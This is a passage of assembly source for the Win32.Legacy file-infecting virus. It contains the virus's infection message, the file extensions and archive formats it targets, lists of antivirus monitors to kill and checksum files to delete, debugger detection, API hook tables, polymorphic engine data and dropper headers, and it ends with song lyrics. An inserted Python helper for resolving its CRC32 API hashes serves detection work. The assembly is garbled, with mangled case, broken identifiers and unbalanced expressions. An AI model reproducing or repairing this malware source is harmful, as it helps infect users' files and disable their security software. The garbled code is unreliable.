Push 000f003fh

Push EAX

Push EAX

Push EAX

Pushs "Software / Microsoft / Windows / Currentversion / Internet Settings / Zones / 0"

PUSH 80000001H

Apicall_RegcreateKeyexa

Push 13D

Call over_ttl

SZTTL DB "[Win32.legacy."

IF Debug

DB "Debug."

ENDIF

VSIZE

DB "v1.00]", 0

Over_ttl:

Push 01h

Push 00h

Pushs "displayname"

Push DWORD PTR [EBP Regha]

Apicall_RegSetValueexa

Push DWORD PTR [EBP Regha]

Apicall_closehandle

NO_PAYLOAD:

RET

PayLoad Endp

Szmsg DB "Welcolme to the win32.legacy payload. You are infected by a virus,", 10

DB "I am Your Worst Nightmare ... But BEWARE! YOUR ORGANISM IS ALSO", 10

DB "infected. so go to the doctor and ask him for a cure for this ...", 10, 10

; From here on, the message is bullshit :)

DB "Featuring:", 10

DB 09, "MultiMedia Extensions Engine [mmxe v1.01]", 10

DB 09, "PolymorphiTiot Random Engine [PHIRE V1.00]", 10

DB 09, "Internal Encryptor Technology [Ienc V1.00]", 10

DB 10, "Greetings:", 10

DB 09, "STARZER0 / IKX & INT13H -> Thanx for Information About Archives", 10

DB 09, "Murkry / Ikx -> Thanx for 'Win95 Structures & Secret' Articles", 10

DB 09, "ZAXON / DDT -> Thanx for getting me inTo asm", 10

DB 09, "Benny / 29A -> Thanx for Information About Threads", 10

DB 09, "The Mental Driller / 29A -> Thanx for Polymorphy Ideas", 10

DB 09, "Super / 29A -> Thanx for Optimization Knowledge & Opcode List", 10

DB 09, "Wintermute -> Thanx for Emulation Ideas", 10

DB 09, "YPSILON -> Thanx for NT Information & Cool Ideas", 10

DB 10, "I don't like the drugs ...", 10

DB 09, "But The Drugs Like Me!", 10, 10

DB "(c) 1999 Bilcebu / IKX", 09, 09, "", 0

Eblock13 label byte

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

; || Data ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

IF debug

Search_mask DB "Goat ???."

Else

Search_mask db "*."

ENDIF

Extension DD 00000000H

EXTENSIONS_TABLE LABEL BYTE

DB "EXE", 0

DB "SCR", 0

DB "CPL", 0

DB "rar", 0

DB "arj", 0

Nextensions EQU (($ -offset extensions_table) / 4)

Threadstable label byte

DD Offset (thrkillmonitors)

DD Offset (thRANTIDEBUGER)

DD Offset (thrdeletecrc)

DD Offset (THRPERPROCESS)

DD Offset (thrprepareinf)

DD Offset (THRINFECTFILES)

NThreads EQU ($ -offset threadstable) / 4)

Monitors2kill Label Byte

DB "AVP MONITOR", 0

DB "amon Antivirus Monitor", 0

DB Billy_bel

FILES2KILL LABEL BYTE

DB "Anti-vir.dat", 0

DB "chklist.dat", 0

DB "Chklist.taV", 0

DB "chklist.ms", 0

DB "chklist.cps", 0

DB "Avp.crc", 0

DB "ivb.ntz", 0

DB "smartchk.ms", 0

DB "smartchk.cps", 0

DB Billy_bel

Drivers2avoid label byte

DB "//./sice" ,0

DB "//./ntice" ,0

DB Billy_bel

; Ienc structure
; 00h  size of block
; 02h  offset of block - offset of virus start

Ienc_struc label byte

DW Offset (EBLOCK1-block1)

DW Offset (Block1-Virus_Start)

DW Offset (EBLOCK2-block2)

DW Offset (Block2-Virus_Start)

DW Offset (EBLOCK3-block3)

DW Offset (Block3-Virus_Start)

DW Offset (EBLOCK4-block4)

DW Offset (Block4-Virus_Start)

DW Offset (EBLOCK5-block5)

DW Offset (Block5-Virus_Start)

DW Offset (eblock6-block6)

DW Offset (Block6-Virus_Start)

DW Offset (EBLOCK7-block7)

DW Offset (Block7-Virus_Start)

DW Offset (EBLOCK8-block8)

DW Offset (Block8-Virus_Start)

DW Offset (EBLOCK9-block9)

DW Offset (Block9-Virus_Start)

DW Offset (EBLOCKA-Blocka)

DW Offset (Blocka-Virus_Start)

DW Offset (EBLOCKB-blockB)

DW Offset (Blockb-Virus_Start)

DW Offset (EBLOCKC-Blockc)

DW Offset (Blockc-Virus_Start)

DW Offset (eblockd-blockd)

DW Offset (Blockd-Virus_Start)

DW Offset (EBLOCKE-Blocke)

DW Offset (Blocke-Virus_Start)

DW Offset (EBLOCKF-Blockf)

DW Offset (Blockf-Virus_Start)

DW Offset (EBLOCK10-block10)

DW Offset (Block10-Virus_Start)

DW Offset (EBLOCK11-block11)

DW Offset (Block11-Virus_Start)

DW Offset (EBLOCK12-block12)

DW Offset (Block12-Virus_Start)

DW Offset (EBLOCK13-block13)

DW Offset (Block13-Virus_Start)

N_ienc_blocks EQU (($ -offset Ienc_Stru) / 4)

DB Billy_bel

@@ hookz label byte

; @@hookz structure
; 00h  API CRC32
; 04h  address of the new handler for that API
; 08h  the address of the original API

DD 02308923FH

DD Offset (Hookmovefilea)

HMOVEFILEA: DD 000000000H

DD 05BD05DB1H

DD Offset (HookcopyFilea)

HcopyFilea: DD 000000000H

DD 08F48B20DH

DD Offset (HookgetFullPathname)

HGETFULLPATHNAMEA: DD 000000000H

DD 0DE256FDEH

DD Offset (HookDeletefilea)

HDeletefilea: DD 000000000H

DD 028452C4FH

DD Offset (Hookwinexec)

Hwinexec: DD 000000000H

DD 0267E0B05H

DD Offset (HookcreateProcessa)

HCREATEPROCESSA: DD 000000000H

DD 08C892DDFH

DD Offset (HookcreateFilea)

HcreateFilea: DD 000000000H

DD 0C633D3DEH

DD Offset (HookGetFileAttributesa)

HGETFILEATTRIBUTESA: DD 000000000H

DD 03C19E536H

DD Offset (HooksetFileAttributesa)

HsetFileAttributesa: DD 000000000H

DD 0f2f886e3h

DD Offset (hook_lopen)

H_Lopen: DD 000000000H

DD 03BE43958H

DD Offset (Hookmovefileexa)

HMOVEFILEEXA: DD 000000000H

DD 0953F2B64H

DD Offset (Hookcopyfileexa)

HcopyFileExa: DD 000000000H

DD 068D8FC46H

DD Offset (hookopenfile)

Hopenfile DD 000000000H

DD 0FFC97C1FH

DD Offset (HookgetProcaddress)

HGETPROCADDRESS: DD 000000000H

DD 0AE17EBEFH

DD Offset (Hookfindfirstfilea)

HfindfirstFilea: DD 000000000H

DD 0AA700106H

DD Offset (HookfindNextFilea)

HfindNextFilea: DD 000000000H

NHOOKEDAPIS EQU (($ -offset @@ hookz / 4) / 3)

DB Billy_bel

@@ namezcrc32 label byte

@Findfirstfilea DD 0AE17EBEFH

@FindNextFilea DD 0AA700106H

@FindClose DD 0C200BE21H

@Createfilea DD 08C892DDFH

@Deletefilea DD 0DE256FDEH

@SetFilePointer DD 085859D42H

@SetFileAttributesa DD 03C19E536H

@Closehandle dd 068624a9dh

@Getcurrentdirectorya DD 0eBC6C18BH

@SetcurrentDirectorya DD 0B2DBD7DCH

@Geetwindowsdirectorya DD 0FE248274H

@Getsystemdirectorya DD 0593AE7CEH

@Createfilemappinga DD 096B2D96CH

@MapViewoffile DD 0797B49ECH

@Unmapviewoffile dd 094524b42h

@SetenDoffile dd 059994ed6h

@GetProcaddress DD 0FFC97C1FH

@LoadLibrarya DD 04134D1ADH

@GetsystemTIME DD 075B7EBE8H

@CreateThread DD 019F33607H

@WaitforsingleObject DD 0D4540229H

@Exitthread dd 0058f9201h

@Gettickcount dd 0613fd7bah

@Freelibrary DD 0AFDF191FH

@WriteFile DD 021777793H

@Globalallloc DD 083A353C3H

@Globalfree DD 05CDF6B6AH

@Geetfilesize dd 0ef7d811bh

@Geetfileattributesa DD 0C633D3DEH

@Readfile dd 054d8615ah

@Getcurrentprocess dd 003690e66h

@GetpriorityClass DD 0A7D0D775H

@SetPriorityClass DD 0C38969C7H

DB Billy_bel

@FindWindowa DD 085AB3323H

@PostMessagea DD 086678A04H

@MessageBoxa DD 0D8556CF7H

DB Billy_bel

@RegcreateKeyexa DD 02C822198H

@regsetValueexa DD 05B9EC9C6H

DB Billy_bel
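The @@namezcrc32 and @@hookz tables identify APIs only by a 32-bit CRC, so the names never appear in the file and an analyst recovers them by hashing a dictionary of known exports and looking the constants up. The Python below is an added example for this page, not the sample's own code: it implements that dictionary resolution for three common CRC-32 conventions and a helper that tells which convention reproduces a known (name, hash) pair. The export list is constructed and short; which convention the sample actually uses is not verified here and has to be established by feeding one of the page's own pairs to identify_variant.

```python
"""Dictionary resolution of CRC-32 API hashes."""
import zlib
from typing import Callable, Dict, Iterable, Optional


def crc32(name: str) -> int:
    """Standard CRC-32 (IEEE, as in zlib) of the bare export name."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def crc32_inverted(name: str) -> int:
    """CRC-32 without the final XOR, a common variant in hand-written asm."""
    return crc32(name) ^ 0xFFFFFFFF


def crc32_with_nul(name: str) -> int:
    """CRC-32 over the name including its terminating NUL byte."""
    return zlib.crc32(name.encode("ascii") + b"\x00") & 0xFFFFFFFF


VARIANTS: Dict[str, Callable[[str], int]] = {
    "crc32": crc32,
    "crc32-inverted": crc32_inverted,
    "crc32-nul": crc32_with_nul,
}

# Constructed export list; a real run reads the export tables of
# kernel32.dll, user32.dll and advapi32.dll, the DLLs this sample resolves.
EXPORTS = [
    "FindFirstFileA", "FindNextFileA", "FindClose", "CreateFileA",
    "DeleteFileA", "SetFilePointer", "CloseHandle", "GetProcAddress",
    "LoadLibraryA", "CreateThread", "MessageBoxA", "RegCreateKeyExA",
    "RegSetValueExA",
]


def identify_variant(name: str, observed: int) -> Optional[str]:
    """Given one (name, hash) pair taken from the sample, return the label
    of the variant that reproduces it, or None if none of them does."""
    observed &= 0xFFFFFFFF
    for label, fn in VARIANTS.items():
        if fn(name) == observed:
            return label
    return None


def resolve_hashes(hashes: Iterable[int], exports: Iterable[str],
                   variant: str = "crc32") -> Dict[int, Optional[str]]:
    """Map each hash to the export name that produces it under `variant`
    (None when no dictionary entry matches)."""
    fn = VARIANTS[variant]
    table = {fn(n): n for n in exports}
    return {h & 0xFFFFFFFF: table.get(h & 0xFFFFFFFF) for h in hashes}


if __name__ == "__main__":
    # Usage: put the table constants from the sample here, e.g.
    # resolve_hashes([0xAE17EBEF, 0xAA700106], EXPORTS, variant=...)
    demo = resolve_hashes([crc32("MessageBoxA"), 0], EXPORTS)
    for h, name in demo.items():
        print(f"{h:08x} -> {name}")
```

Once the variant is known, the same lookup over the @@hookz table shows which file and process APIs the sample redirects, which is the list a detection engineer wants when writing a behavioural rule for this family.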

; --- Rar Header

Rarheader label byte

RarheaderCrc dw 0000h

Rartype DB 74H

RARFLAGS DW 8000H

Rarheadsize DW SRarheadersize

RARCOMPRESSED DD 00000000H

Raroriginal DD 00000000H

Raros DB 00H

RARCRC32 DD 00000000H

RARFILETIME DW Archive_mark

RARFILEDATE DB 31H, 24h

Rarneedver DB 14h

Rarmethod db 30h

RARFNAMESIZE DW SRARNAMESIZE

RARATTRIB DD 00000000H

Rarname DB "Legacy.exe"

SRARHEADERSIZE EQU ($ -offset rarheader)

SRarNameSize EQU ($ -offset rarname)

; --- arj header

Arjheader Label Byte

Arjsig db 60h, 0eah

Arjheadsiz DW 2ah

Arjhsmsize DB 1eh

Arjver DB 07h

Arjmin db 01h

Arjhost DB 00H

Arjflags DB 10h

ArjMethod DB 00H

Arjfiletype DB 00H

ArjReserved DB "Z"

Arjfiletime DW archive_mark

ArjfileDate DB 031H, 024H

Arjcompress DD 00000000H

ArjORIGINAL DD 00000000H

Arjcrc32 DD 00000000h

ArjentryName DW 0000H

Arjattribute DW 0000H

ArjhostData DW 0000H

SARJHEADER EQU ($ -offset arjheader)

Arjsecondside Label Byte

Arjfilename DB "Legacy.exe", 0

Arjcomment db 00h

SARJCRC32SIZE EQU ($ -offset arjhsmsize)

ArjheaderCrc DD 00000000H

Arjextended dw 0000h

SARJSECONDSIDE EQU ($ -offset arjsecondside)

SARJTALSIZE EQU ($ -offset Arjsig)

ArchiveBuffer DB 50D DUP (00h)

OldBytes DB Plimit DUP (00h)

Newbytes DB Plimit DUP (00h)

K32_DLL DB "kernel32.dll", 0

K32_Size EQU ($ -offset k32_dll)

Kernel DD 00000000H

User32 DD 00000000H

TMPMODULEBASE DD 00000000H

TEMPGA_IT1 DD 00000000H

ImageBase EQU MODBASE

TEMPGA_IT2 DD 00000000H

Infections DD 00000000H

Iobytes DD 02H DUP (00h)

Newsize dd 0000000000h

Infdroppersize DD 00000000H

ArchiveSize DD 00000000H

NumbytesRead DD 00000000H

SearchHandle DD 00000000H

fileHandle DD 00000000H

Reghandle DD 00000000H

GlobalAlalochandle DD 00000000H

Globalallochandle2 DD 00000000H

GlobalAllochandle3 DD 00000000H

MapHandle DD 0000000000h

MapAddress DD 00000000H

AddresStableva DD 00000000H

NameTableva DD 00000000H

OrdinalTableva DD 00000000H

LPTHREADID DD 00000000H

Disposition DD 00000000H

WFD_HNDINMEM DD 00000000H

Counter dw 0000h

Wfd_handles_count db 00h

Softice db 00h

; --- MMXE data

Random_seed label byte

RND_SEED1 DD 00000000H

RND_SEED2 DD 00000000H

RND_SEED3 DD 00000000H

DD 00000000h

; Registers used (MMXE & PHIRE)

@@ reg_mask db 00h

@@ reg_key db 00h

@@ reg_counter db 00h

@@ reg_ptr2data db 00h

@@ reg_aux1 EQU $ -1

@@ reg_delta db 00h

@@ reg_aux2 EQU $ -1

@@ mmx_ptr2data db 00h

@@ mmx_key db 00h

@@ it_mmx? db 00h

@@ ptr_data2enc dd 00000000h

@@ ptr_buffer DD 00000000h

@@ size2enc dd 00000000h

@@ size2cryptd4 dd 00000000h

@@Tmp_call DD 00000000H

@@ p_tmp_call EQU $ -4

@@ fix1 dd 00000000h

@@ fix2 DD 00000000H

@@ enc_key dd 00000000h

@@ l00paddress DD 00000000h

@@ size_address DD 00000000h

@@ ptrto2nd dd 00000000h

@@ flags dw 0000h

@@ recursion db 00h

; --- Phire Data

@@ p_distance dd 00000000h

@@p_buffer dd 00000000h

; --- More Virus Data

@@ offsetz label byte

_FindfirstFilea DD 00000000H

_FindNextFilea DD 00000000H

_FindClose DD 00000000H

_CreateFilea DD 00000000H

_Deletefilea DD 00000000H

_SetFilePointer DD 00000000H

_SetFileAttributesa DD 00000000H

_CloseHandle DD 00000000H

_GetcurrentDirectorya DD 00000000H

_SetcurrentDirectorya DD 00000000H

_GetWindowsDirectorya DD 00000000H

_GetsystemDirectorya DD 00000000H

_CreateFilemappinga DD 00000000H

_MapViewoffile DD 00000000H

_UnmapViewoffile DD 00000000H

_SETENDOFFILE DD 00000000H

_GetProcaddress DD 00000000H

_LoadLibrarya DD 00000000H

_GetsystemTIME DD 00000000H

_Createthread DD 00000000H

_WaitForsingleObject DD 00000000H

_Exitthread DD 00000000H

_GettickCount DD 00000000H

_Freelibrary DD 00000000H

_WriteFile DD 00000000H

_GlobalAlloc DD 00000000H

_GlobalFree DD 00000000H

_GetfileSize DD 00000000H

_GetfileAttributesa DD 00000000H

_Readfile dd 0000000000h

_GetcurrentProcess DD 00000000H

_GetPriorityClass DD 00000000H

_SETPRIORITYCLASS DD 00000000H

@@ offsetzuser32 label byte

_FindWindowa DD 00000000H

_PostMessagea DD 00000000H

_MessageBoxa DD 00000000H

@@ offsetzadvapi32 label byte

_RegcreateKeyexa DD 00000000H

_RegSetValueexa DD 00000000H

MAX_PATH EQU 260

Filetime Struc

FT_DWLOWDATETIME DD?

FT_DWHIGHDATETIME DD?

Filetime Ends

Win32_find_data label Byte

WFD_DWFILEATTRIBUTES DD?

WFD_FTCREATIONTIME FileTime?

WFD_FTLASTACCESSTIME FileTime?

WFD_FTLASTWRITETIME FILETIME?

WFD_NFILESIGH DD?

WFD_NFILESZELOW DD?

WFD_DWRESERVED0 DD?

WFD_DWRESERVED1 DD?

WFD_SZFILENAME DB MAX_PATH DUP (?)

Wfd_szalternateFileName DB 13 DUP (?)

DB 03 DUP (?)

TMP_SZFILENAME DB MAX_PATH DUP (?)

Directories label byte

WindowsDir DB 7FH DUP (00h)

SystemDir DB 7FH DUP (00h)

Origindir DB 7FH DUP (00h)

DIRS2INF EQU ($ -directories) / 7FH)

MirrorMirror DB DIRS2INF

SystemTime Label Byte

ST_WYEAR DW?

ST_WMONTH DW?

ST_WDAYOFWEEK DW?

ST_WDAY DW?

ST_WHOUR DW?

ST_WMINUTE DW?

ST_WSECOND DW?

ST_WMILLISECONDS DW?

Align DWORD

Virus_end label byte

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] []

; || 1st generation host ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

;

; Nobody fights against freedom; at most, they fight against the freedom of
; others. Freedom has always existed, but sometimes as the privilege of some,
; other times as the right of all. (Karl Marx)

Fakehost:

POP DWORD PTR FS: [0]

POP EAX

Popad

Popad

Push 00h; Hiya Vecna! Cocaine Rules!

Push Offset Szmessage; Even ITS 1st Gen Host!;)

IF Debug

Pushs "Win32.legacy.debug # legacy [debug mode] v1.00"

Else

Pushs "Win32.legacy # legacy v1.00"

ENDIF

Push 00h

Call shellabouta

Push 00h

Call EXITPROCESS

End legacy1

; ================================================== ==========================

; || Bonus TRACK ||

; ================================================== ==========================

;

; As this virus is my favourite one, I will put here my favourite song :)
; It's a song from the last album of Blind Guardian (www.blind-guardian.com),
; based on the book The Silmarillion (J.R.R. Tolkien). The album (called
; "Nightfall in Middle-Earth") is the most complete (and probably the best one)
; of Blind Guardian. Even the mixers of the album are very famous in the metal
; world: Flemming Rasmussen (see other B.G. albums such as "Imaginations from
; the Other Side", also Metallica's "...And Justice for All", etc.), Piet Sielck
; (some songs of B.G.'s versions album "The Forgotten Tales", also
; vocalist/producer of his parallel project Iron Savior (albums "Iron Savior"
; and "Unification"), and he has also produced other bands such as Gamma Ray,
; etc.) and Charlie Bauerfeind. Well, here comes the song.

;

; - mirror mirror -

;

Far, Far Beyond The Island

; We dwelt in the shades of twilight

; Through Dread and Weary Days

; Through Grief and Endless Pain

;

IT LIES UNKNOWN

The land of mine

A hidden gate

; To save us from the shadow fall

;

; The Lord of Water Spoke

In the Silence

Words of Wisdom

I've seen the end of all

Be aware, The Storm Gets Closer

;

Chorus:

Mirror Mirror on The Wall

: True Hope Lies Beyond The Coast

You're a damned Kind Can't you see

That The Winds Will Change

Mirror Mirror on The Wall

: True Hope Lies Beyond The Coast

You're a damned Kind Can't you see

; That Tomorrow Bears Insanity

;

Gone's the Wisdom

; Of a thousand years

; A World in Fire and Chains and Fear

Leads me to a place so far

Deep Down It Lies My Secret Vision

I better Keep IT Safe

;

; Shall I leave my friends alone

Hidden in My Twilight Hall

; (I) KNOW the world is lost in fire

Sure the no way to turn it

; Back to the old days

; Of bliss and cheerful laughter; We're Lost in Barren Lands

Caught in the Running Flames

Alone

;

How Shall We Leave The Lost Road

; Time's Getting Short So Follow Me

A Leader's Task So Clearly

To find a path out of the Dark

;

(chorus)

;

Even though

The Storm Calmed Down

The bitter end

IS Just a Matter of Time

;

Shall We Dare The Dragon

; Mercyless He's Poisoning Our Hearts

; Our hearts

;

HOW ...

(chorus)

;

; ----

Copyright (c) 1998 by Blind Guardian; "Nightfall In The Middle-Earth" Album

;
